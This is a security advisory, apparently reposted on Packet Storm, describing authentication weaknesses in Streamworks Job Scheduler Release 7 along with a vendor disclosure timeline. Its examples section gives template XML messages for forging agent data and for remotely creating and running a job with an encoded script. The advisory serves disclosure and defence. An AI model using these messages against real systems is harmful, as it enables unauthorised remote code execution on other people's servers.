exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Streamworks Job Scheduler Release 7 Authentication Weakness

Streamworks Job Scheduler Release 7 Authentication Weakness
Posted Jan 16, 2019
Authored by Simon Bieber

Streamworks Job Scheduler Release 7 has all agents using the same X.509 certificates and keys issued by the vendor for authentication. The processing server component does not check received messages properly for authenticity. Agents installed on servers do not check received messages properly for authenticity. Agents and processing servers are vulnerable to the TLS Heartbleed attack.

tags | exploit
advisories | CVE-2014-0160
SHA-256 | 8d3ab2a2e1407bcba852d7925fccb15e6610ced1db687ba89dc4e1333028ea6d

Streamworks Job Scheduler Release 7 Authentication Weakness

Change Mirror Download

Affected Products
Streamworks Job Scheduler Release 7 (older/newer releases have not
been tested)

References
Secuvera-SA-2016-01
https://www.secuvera.de/advisories/secuvera-SA-2016-01.txt (used for
updates)
No CVE number could be assigned (vendor not listed under
cve.mitre.org/data/board/archives/2016-01/msg00015.html)

Summary:
Arvato Systems Streamworks Job Scheduler is a software product for
automation purposes. It helps
"to plan, maintain, control and monitor all of your automatable IT
processes" (source: vendor product
homepage). It consists of different types of services: an
application server daemon, a processing
server daemon that controls one or multiple agent daemins
installed on operating servers were workload
has to be done.

During a penetration test at a customers site three weaknesses
concerning communication
authentication were discovered:

1) All agents installed on server systems use the same X.509
certificates and private key that
were issued by the vendor for authentication.

2) The processing server component does not check received
messages properly for authenticity.

3) Agents installed on servers do not check received messages
properly for authenticity

4) Agents and processing servers are vulnerable against TLS
Heartbleed attack (CVE-2014-0160 -
see https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160)

Effect:
1) If systems were compromised and authentication material is
stolen, all certificates have to be
revoked and replaced. In addition, this expands the effect of
3) to the entire environment,
not just single systems.

2) An attacker with knwolegde of the message syntax of the product
and the authentication material
is able to add, change or delete data within the Streamworks database.

3) An attacker with knowledge of the message syntax of the product
and the authentication material
is able to create new or execute available jobs on servers with
agents installed located within
the same network. This can lead to a complete loss of integrity,
confidentiality or availability
of the respective system or data stored/processed on it.

4) An unauthenticated remote attacker is able to read content
within system memory.

Vulnerable components and scripts:
Streamworks Job Scheduler Processing Server Release 7.1
Streamworks Job Scheduler Agent Release 7.1
older releases have not been tested

Examples:
In the following, a sample to exploit 2) and 3) will be given.
Replace Information within squared
brackets:

2) By sending a the following XML-Message to a Processing server
it is possible to change system
information of a legitimate configured client as proof-of-concept.
The System OS Info was slightly
changed:

<AgentNotifyStarted ProcessId="7044" AgentVersion="3.1.36">
<ComHeader Version="1.0">
<MandatorCode>0100</MandatorCode>
<MsgCreateTime>2016-02-24T10:26:11[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].745Z</MsgCreateTime>
<MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].963Z</MsgSendTime>
<SourceEndpoint Address="0.0.0.0" Port="30000" SysId="[Hostname of
legitimate Client]" />
<DestinationEndpoint Address="[FQDN of Processing server]"
Port="9600" SysId="[FQDN of Proces
sing server]" />
<Sequence>0</Sequence>
</ComHeader>
<SystemInformation>
<OsType>Windows</OsType>
<OsInfo>Pentest Windows!</OsInfo>
<OsLocale>de_DE.windows-1252</OsLocale>
</SystemInformation>
<KnownJobsList>
</KnownJobsList>
<FileTransferOptions Mode="ALL" BlockSize="0" />
<Cli CliOptions="Enabled" />
</AgentNotifyStarted>


-------------


3) By sending a XML-Message of the following type to create and
execute a new job on a system
<ServerRequestStartJob>
<ComHeader Version="0.1">
<MandatorCode>0100</MandatorCode>
<MsgCreateTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgCreateTime>
<MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgSendTime>
<SourceEndpoint Address="[FQDN of processing server]"
Port="9600" SysId="[FQDN of processing
server]" />
<DestinationEndpoint Address="[IP of Server with agent
installed]" Port="30000" SysId="[Hostname of
server with agent installed]" />
<Sequence>1</Sequence>
<MandatorId>0100</MandatorId>
</ComHeader>
<JobStartInfo>
<JobInfo ServerJobId="118291965_1" ExecutionNo="1"
PlanDate="[YYYY]-[MM]-[DD]"
StreamName="[NewStreamName]" JobName="[NewJobName]" Run="1" />
<UserName>[Username under which the agent should run the
Script, e.g. LOCAL\System]</UserName>
<Password>[Add Password of the user if needed]</Password>
<UseUserProfile>true</UseUserProfile>
<MainScript>[base64-encoded Script code, e.g.
"cmVtDQpDOlxXaW5kb3dzXE5vdGVwYWQuZXhl"
to start a notepad.exe on a Windows Host]</MainScript>
<KeepJoblogDays>10</KeepJoblogDays>
</JobStartInfo>
</ServerRequestStartJob>

Solution:
Install Streamworks Release 9.3

(https://it.arvato.com/de/solutions/it-solutions/lp/streamworks-release-9-3.html - page available
in
german only)

Disclosure Timeline:
2016/05/12 vulnerabilities discovered
2016/05/30 vendor initially contacted
2016/06/13 sales representative replied
2016/06/14 technically responsible contact details received
2016/07/01 technical personnel contacted, appointment to discuss
findings made
2016/07/11 submitted technical details to responsible personnel
2016/07/12 responsible product manager replied. Committed to
extend disclosure timeline due to
comprehensible reasons. New disclosure timeline: end of
September 2016
2016/09/08 product manager replied, suggest meeting to discuss fixes
2016/09/27 meeting took place, half of the vulnerabilities were
fixed. Timeline until disclosure extended
again due to difficult changes. Disclosure timeline
extended to end of April 2017
2017/04/20 Contacted vendor again to remind of the near end of the
disclosure timeline.
2017/04/27 Reply and ongoing discussion about when the fix will be shipped.
2017/05/20 Vendor replied that due to customers experience fewer
releases were made. The fix will be shipped
on the second quarter of 2018. Extended disclosure
timeline until the end of June 2018.
2018/04/03 Contacted vendor as reminder and to get a release ship date.
2018/04/09 Vendor replied saying that within release 9.3 (shipped
on 2nd quarter 2018) the issues will be fixed
Final disclosure timeline: 2019/01/14 after a
sufficient grace period to customers to install the fixed
release
2019/01/14 public advisory disclosure


Credits
Simon Bieber, secuvera GmbH
sbieber@secuvera.de
https://www.secuvera.de

Disclaimer:
All information is provided without warranty. The intent is to
provide informa-
tion to secure infrastructure and/or systems, not to be able to
attack or damage.
therefore secuvera shall not be liable for any direct or indirect
damages that
might be caused by using this information.





Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close